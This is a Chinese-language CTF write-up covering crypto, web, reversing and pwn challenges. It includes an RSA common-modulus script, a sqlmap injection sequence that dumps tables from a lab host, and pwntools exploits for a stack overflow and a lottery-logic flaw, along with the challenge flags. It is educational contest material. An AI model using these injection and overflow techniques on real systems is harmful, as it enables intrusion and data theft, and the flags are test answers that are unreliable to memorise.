128047209934897531165640656545265432129228051499097668497556366047958398065650411415679178667994874801183211387584263049558783155175767687238376471410239080112711124265070494253545550677338177794236101154236088426957326670769027325615443788437039101171236214635953405255678812319280348639618370940501270852396503437705371789757438962533876021667231464485728421299638562179997341138328236001424780696712571002135260148519500712362439953653944355027072979814788830783705112200297578557508118083350535342083589595675074346510002454672011201752131446376950924253272419491165736835235206925743817331628994100865143504378023136929659750340651101832064496348352350702376046323276094459942388685382675023183118530352161251133369180852304565111257183512362280542493945792038367777367723291187135549890852439777783176301668783316103120542108214839147707138832048275265262384660908753395891466112378941683412660508097841687284429004366956398803390383786848146420795723276245649798155000506076558805159575568899908133130199217912540344424722548254389192205850179860024715312937155216947617503102080404845966308161835985658840727036320930054409346586143429418685089236924314979718486219096656958761207121613200307960599376376751153525554473307533,
236287727526936694810272614094992980242721693535416926477097033811760002325696040571302711584071552745720524501838734075439505260610094846587110698104370198495320428150883330530044160000718797914162721813131650632467266182927745360511349952800464925619789167066211155698819974555700344338980538992034932465084971019831873882992648582934989970694430975806823718381360139028755494008423203828583616107737184645655736859398213587197019572454522219484310024799997736339888040163613687205738262173205164544103432867359560154903611417409457541590542527918521543456198452927014085894235180824290106779767373064882855272262764598999200526024748196964109545955911014514411069985137943312900718395378413386905365004870600311280657805336349804384633445491202708932616649956955563221525451663402197460448895914438981660613206778572540245823448678395024212618006658385681869524887968993186136893139648284248023600423783302922960152057751131805091718148469820246570202777551312460557159903033720353229268633850274480446367571935085859489343640899825688088579915166107493273469038622840562987271174949658137917542872593944900982943247999140438705810091160619797053905929385570893823862140353534583761732026051569066785734070136821001864045468123610]
def gcd(a, b):
if a < b:
a, b = b, a
while b != 0:
temp = a % b
a = b
b = temp
return a
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
#这里e和c的序号可以从32个里面选两个
e1 = e[1]
e2 = e[2]
s = egcd(e1,e2)
s1 = s[1]
s2 = s[2]
c1 = c[1]
c2 = c[2]
print(s)
n = 303552029739268787689421034809301542668363111985448197488656603423285809555016225763507821058977191376975609612314573787148430030014978401102426346290180457645094380918591576333426636173812372946449416193133967635136948329497046720932035699306242881374653629170574541376888732480402461582716866722983695803770299355842301744494399283912359159762979974274635961976611573875536934818825542925610132556421395122301055777262562802177229272506178634122630325492174876899080153722085540119976788604275939786645770106319848807686165366996569539304747120908823654505597519971616647713951114166662291810700501111018118275233410176961734636469348235124203204134145130577525538890279384881751619815307136021730662753639447139755612989914958460173737679972680019340240434795555887059008048980208310031478812591690215353375022942428110381458613385128108872115242768135293903468683608857300743326973147004626582751679482312050023468740515408350833053825882533336460567233765353505688832265072613475683680709995436584288121440632015107692526152295970809776420786093311436754175740811154244080248787476374748432605004090718808330731360388760195905565111121494331277093420237515276837204677350020884323188865761880255671146749130841857969707181931683
if s1 < 0:
s1 = -s1
c1 = modinv(c1,n)
if s2 < 0:
s2 = -s2
c2 = modinv(c2,n)
m = (pow(c1,s1,n)*pow(c2,s2,n)) % n
print(n2s(m))
print(pow(m,e1,n) == c1)
print(pow(m,e2,n) == c2)
#flag{RSA_is_a_popular_algorithm}
最后很迷的是算出来的m只符合一个,另一个是False。
在网上看了一个讲解还不错,附上网址http://bobao.360.cn/learning/detail/3058.html
Web
0x06 Sql50
最简单的sqlmap注入,当天晚上还在试手注,难受。
payload如下
py -2 sqlmap.py -u 10.4.21.55:10010?id=1
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 --dbs
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables =T Marinata --columns
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables =T Marinata --columns -C Hinata --dump
flag{Power_of_Ldy}
Re
0x07 re100
简单的逆向,当时主要是没把那个或当回事。。。没怎么见过或运算不太敏感。
逻辑关系:flag + 9 = ( (key&0xAA) >> 1 ) | ( 2 * (key&0x55) )
脚本如下
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0x8F,0xAA,0x85,0xA0,0x48,0xAC,0x40,0x95,0xB6,0x16,0xBE,0x40,0xB4,0x16,0x97,0xB1,0xBE,0xBC,0x16,0xB1,0xBC,0x16,0x9D,0x95,0xBC,0x41,0x16,0x36,0x42,0x95,0x95,0x16,0x40,0xB1,0xBE,0xB2,0x16,0x36,0x42,0x3D,0x3D,0x49]
flag = ''
for i in range(len(a)):
flag += chr( (((a[i]&0xAA)>>1) | (2*(a[i]&0x55))) - 9 )
print(flag)
#FLAG{Swap two bits is easy 0xaa with 0x55}
0x08 re200
听说不能F5?!之后才知道可以像上次hctf一样修复。
方法一:修复F5
关键函数是check并且就是它不能f5,如下图
在红色的那一行点字母D,就可以了。
方法二:gdb直接跟到strcmp
由于最后有个比较函数,所以可以在strcmp处下断点,地址为0x4006B6,即check+112。
然后run,输入足够长的字符串后可以直接看到flag。
方法三:gdb一步一步跟。
可发现输入的字符串是经过异或1,2,4,6等从而和目标串匹配,从而写脚本得到flag。
脚本如下
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0x66,0x6E,0x65,0x61,0x73,0x42,0x6D,0x78,0x75,0x4D,0x61,0x49,0x6C,0x68,0x75,0x7B,0x44,0x7D,0x63,0x62,0x6A,0x15,0x51]
flag = ''
for i in range(len(a)):
flag += chr( a[i]^(2*i) )
print(flag)
#flag{Have_u_tried_GDB?}
0x09 re300(js加密混淆)
首先在网址http://matthewfl.com/unPacker.html格式化。得到
console.log((function()
{
if(typeof(require)=='undefined')return'(´・ω・`)';
var code=require('process').argv[2];
if(!code)return'(´・ω・`)';
String.prototype.zpad=function(l)
{
return this.length<l?'0'+this.zpad(l-1):this
};
function encrypt(data)
{
return'"'+(Array.prototype.slice.call(data).map((e)=>e.charCodeAt(0)).map((e)=>(e*0xb1+0x1b)&0xff).map((e)=>'\u'+e.toString(16).zpad(4))).join('')+'"'
}
var crypted="balabalabalayidachuan";
if(JSON.parse(encrypt(code))!=crypted)return'(´・ω・`)';
try
{
eval(code)
}
catch(e)
{
return'(´・ω・`)'
}
return'(*´∀`)~♥'
}
)())
关键代码在这:(e)=>(e*0xb1+0x1b)&0xff)
也就是说flag经过数乘加法,然后取低八位得到加密串。要想直接逆回去是不可能的,所以爆破。
脚本如下
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0xff,0xff,0xff,0x48,0x39,0x06,0x68,0xe6,0xff,0xff,0xff,0x48,0x26,0xca,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0xff,0x35,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0xca,0x35,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xff,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0xff,0x35,0xc3,0x26,0x88,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xff,0xca,0xff,0x35,0xc3,0xff,0xff,0xff,0x06,0xff,0xff,0xff,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xff,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0xca,0x35,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xca,0xca,0x35,0xc3,0x26,0x88,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xff,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x88,0xe6,0xff,0xff,0xff,0xe9,0xff,0xca,0x48,0xc3,0xff,0xff,0xff,0xe9,0xff,0xca,0x48,0xff,0xff,0xff,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0x68,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0xff,0x48,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xff,0xff,0x48,0xc3,0xff,0xff,0xff,0xe9,0xff,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xc3,0xec,0xff,0xff,0xff,0x74,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0x68,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0xca,0x48,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xff,0x48,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0x48,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0x74,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xe6,0xff,0xff,0xff,0xe9,0xff,0xff,0x48,0xff,0xff,0xff,0xe9,0xff,0xd6,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xe6,0xff,0xff,0xff,0xe9,0xff,0x48,0xc3,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0x74,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0x68,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0x68,0xe6,0xff,0xff,0xff,0xe9,0xff,0xc3,0xff,0xff,0xff,0xe9,0xff,0xc3,0xff,0xff,0xff,0xe9,0xff,0xff,0xd6,0x9d,0xb7,0x9d,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xca,0xd6,0x9d,0xe9,0x9d,0xd6,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xd6,0x9d,0xc3,0xb7,0xb7,0xb7,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xd6,0x9d,0x26,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0x88,0xb7,0xb7,0xb7,0x9d,0x74,0xe6,0x9d,0xd6,0x9d,0xb7,0x9d,0x9d,0x74,0xc3,0x74,0x74,0xc3,0x74,0xe6]
flag = []
for i in range(256):
for j in range(256):
if (( j*0xb1 + 0x1b )&0xff) == i:
flag.append(j)
break
flag1 = ''
for i in a:
flag1 += chr( flag[i] )
print(len(a),len(flag1))
print(flag1)
得到:
$$$=~[];$$$={___:++$$$,$$$$:(![]+"")[$$$],__$:++$$$,$_$_:(![]+"")[$$$],_$_:++$$$,$_$$:({}+"")[$$$],$$_$:($$$[$$$]+"")[$$$],_$$:++$$$,$$$_:(!""+"")[$$$],$__:++$$$,$_$:++$$$,$$__:({}+"")[$$$],$$_:++$$$,$$$:++$$$,$___:++$$$,$__$:++$$$};$$$.$_=($$$.$_=$$$+"")[$$$.$_$]+($$$._$=$$$.$_[$$$.__$])+($$$.$$=($$$.$+"")[$$$.__$])+((!$$$)+"")[$$$._$$]+($$$.__=$$$.$_[$$$.$$_])+($$$.$=(!""+"")[$$$.__$])+($$$._=(!""+"")[$$$._$_])+$$$.$_[$$$.$_$]+$$$.__+$$$._$+$$$.$;$$$.$$=$$$.$+(!""+"")[$$$._$$]+$$$.__+$$$._+$$$.$+$$$.$$;$$$.$=($$$.___)[$$$.$_][$$$.$_];$$$.$($$$.$($$$.$$+"""+$$$.$$__+$$$._$+"\"+$$$.__$+$$$.$_$+$$$.$$_+"\"+$$$.__$+$$$.$$_+$$$._$$+$$$._$+(![]+"")[$$$._$_]+$$$.$$$_+"."+(![]+"")[$$$._$_]+$$$._$+"\"+$$$.__$+$$$.$__+$$$.$$$+"(\"\"+$$$.__$+$$$.___+$$$.$$_+"\"+$$$.__$+$$$.__$+$$$.$__+"\"+$$$.__$+$$$.___+$$$.__$+"\"+$$$.__$+$$$.___+$$$.$$$+"{\"+$$$.__$+$$$.__$+$$$._$_+"\"+$$$.__$+$$$._$_+$$$._$$+"\"+$$$.$__+$$$.___+"\"+$$$.__$+$$$.___+$$$.$_$+"\"+$$$.__$+$$$.$_$+$$$.$$_+$$$.$$__+$$$._$+$$$.$$_$+$$$.$$$_+"\"+$$$.__$+$$$.$$_+$$$._$_+"\"+$$$.$__+$$$.___+"\"+$$$.__$+$$$._$_+$$$._$$+$$$._+$$$.$$__+"\"+$$$.__$+$$$.$_$+$$$._$$+"\"+$$$.__$+$$$.$$_+$$$._$$+"}\");"+""")())();
目测又是js,于是360浏览器里的console里跑一发,得到FLAG{JS Encoder Sucks}
Pwn
0x10 pwn100
菜的一批就弄了一个pwn,这题就是要输入一个payload根据返回的地址猜测覆盖到ret所需的字节数,注意是64位的。
脚本如下
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from pwn import *
io = remote('10.4.21.55',9001)
io.recvuntil("0x")
sys_addr = int(io.recv()[:12],16)
payload = 'f' * 56
payload += p64(sys_addr)
io.sendline(payload)
io.interactive()
0x11 pwn200(赛后搞出来的,记录一下)
首先用DIE扫一下(也可以在Linux环境下执行file+文件名),如图
是个pyc文件,去网上在线反编译得到如下代码
#!/usr/bin/env python
# encoding: utf-8
# 访问 http://tool.lu/pyc/ 查看更多信息
__Auther__ = 'M4x'
from string import printable
from random import choice
from os import system
from sys import stdin, stdout, stderr
from termios import tcflush, TCIFLUSH
from time import sleep
dic = list(printable)
def Flush():
stdout.write('stdout1')
stderr.write('stderr1')
stderr.write('stderr1')
def Help():
print '
'
print 'M4x will give you 6 random printable chars'
print 'And you are supposed to match all the chars'
print 'If you match all the chars successfully, flag will goes to you'
print 'Good luck!'
print '
'
def Play():
tcflush(stdin, TCIFLUSH)
submit = raw_input('Give me your 6 chars: ')
if len(submit) != 6:
print 'Error length'
return None
lotto = [
None] * 6
for i in xrange(6):
lotto[i] = choice(dic)
match = 0
for i in xrange(6):
for j in xrange(6):
if lotto[i] == submit[j]:
match += 1
continue
if match == 6:
system('cat flag')
else:
print 'Have a nice day'
if __name__ == '__main__':
while True:
print '[*]Select menu'
print '[*]1. Play Game'
print '[*]2. Seek Help'
print '[*]3. Exit'
menu = input('Your choice: ')
if menu == 1:
Play()
continue
if menu == 2:
Help()
continue
if menu == 3:
print 'See you!'
break
continue
print 'Invald menu'
pwn的题目当然是要找漏洞啦,关键在这
for i in xrange(6):
for j in xrange(6):
#lotto是随机得到的长度为6的字符串,submit是我们输入的
if lotto[i] == submit[j]:
match += 1
continue
可以看到它每次都将lotto的一个元素和submit的所有元素比较一遍,匹配的话match就加一,那么我们输入的submit只需要赋为6个元素都相同的字符串,接下来就是不断地发送payload。
脚本如下
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from pwn import *
io = remote('10.4.21.55',9002)
payload = 'a'*6
while(1):
io.recvuntil('choice: ')
io.sendline('1')
io.recvuntil("chars: ")
io.sendline(payload)
str = io.recvline()
print str
io.interactive()
题目出处:Islab
题目链接:https://pan.baidu.com/s/1eSpQ9qi
密码:4jlf